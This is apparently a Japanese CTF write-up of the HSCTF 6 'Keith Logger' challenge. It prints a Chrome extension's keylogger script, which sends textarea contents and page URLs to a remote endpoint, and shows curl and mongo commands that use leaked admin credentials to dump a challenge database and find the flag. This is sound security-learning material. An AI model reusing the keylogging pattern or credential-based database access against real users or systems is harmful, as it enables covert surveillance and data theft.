HSCTF 6 Writeup - Keith Logger
Question
Keith is up to some evil stuff! Can you figure out what he's doing and find the flag?
Solution
添付ファイルは拡張子crxのChrome Extension。
7zipで中身を覗くとcontent.jsがある。
var timeout_textarea; var xhr_textarea; $("textarea").on("keyup", function() { if (timeout_textarea) { clearTimeout(timeout_textarea); } if (xhr_textarea) { xhr_textarea.abort(); } timeout_textarea = setTimeout(function() { var xhr = new XMLHttpRequest(); /* xhr.open( "GET", "https://keith-logger.web.chal.hsctf.com/api/record?text=" + encodeURIComponent($("textarea").val()) + "&url=" + encodeURIComponent(window.location.href), true );*/ // send a request to admin whenever something is logged, not needed anymore after testing /* xhr.open( "GET", "https://keith-logger.web.chal.hsctf.com/api/admin", true );*/ xhr.send(); }, 2000); });
URLが出てきたのでアクセスしてみる。
root@kali:~# curl "https://keith-logger.web.chal.hsctf.com/api/record?text=aaa&url=bbb" {'text': 'aaa', 'url': 'bbb', 'time': '13:47:05.441928'} root@kali:~# curl "https://keith-logger.web.chal.hsctf.com/api/admin" didn't have time to implement this page yet. use admin:keithkeithkeith@keith-logger-mongodb.web.chal.hsctf.com:27017 for now
更にURLが出てきた。
root@kali:~# curl "keith-logger-mongodb.web.chal.hsctf.com:27017" It looks like you are trying to access MongoDB over HTTP on the native driver port.
mongoDBで接続してみるとよさそうだ。
mongoコマンドが必要。
Kali Linuxにインストールする場合、以下の手順でインストールできる。
接続して、データベース、コレクションを表示する。
root@kali:~# mongo keith-logger-mongodb.web.chal.hsctf.com:27017 -u admin -p keithkeithkeith --authenticationDatabase admin MongoDB shell version v4.0.10 connecting to: mongodb://keith-logger-mongodb.web.chal.hsctf.com:27017/test?authSource=admin&gssapiServiceName=mongodb Implicit session: session { "id" : UUID("ea9498a4-faa7-4a40-9613-9fc71f6c94f2") } MongoDB server version: 4.0.10 > show dbs database 0.000GB > use database switched to db database > show collections collection
database
というデータベースに、collection
というコレクションがあるらしい。
> db.collection.find() { "_id" : ObjectId("5cf0512d464d9fe1d9915fbd"), "text" : "are kitties cool", "url" : "https://keith-logger.web.chal.hsctf.com/", "time" : "21:54:53.925045" } { "_id" : ObjectId("5cf051a95501f2901a915fbd"), "text" : "because i think they are", "url" : "https://keith-logger.web.chal.hsctf.com/", "time" : "21:56:57.974856" } { "_id" : ObjectId("5cf051b3464d9fe1d9915fbe"), "text" : "meow! :3", "url" : "https://keith-logger.web.chal.hsctf.com/", "time" : "21:57:07.295378" } { "_id" : ObjectId("5cf0520b464d9fe1d9915fbf"), "text" : "meow! :3", "url" : "https://keith-logger.web.chal.hsctf.com/", "time" : "21:58:35.030635" } { "_id" : ObjectId("5cf05212464d9fe1d9915fc0"), "text" : "if you're looking for the flag", "url" : "https://keith-logger.web.chal.hsctf.com/", "time" : "21:58:42.170470" } { "_id" : ObjectId("5cf0521b5501f2901a915fbe"), "text" : "it's hsctf{watch_out_for_keyloggers}", "url" : "https://keith-logger.web.chal.hsctf.com/", "time" : "21:58:51.359556" }
フラグゲット
hsctf{watch_out_for_keyloggers}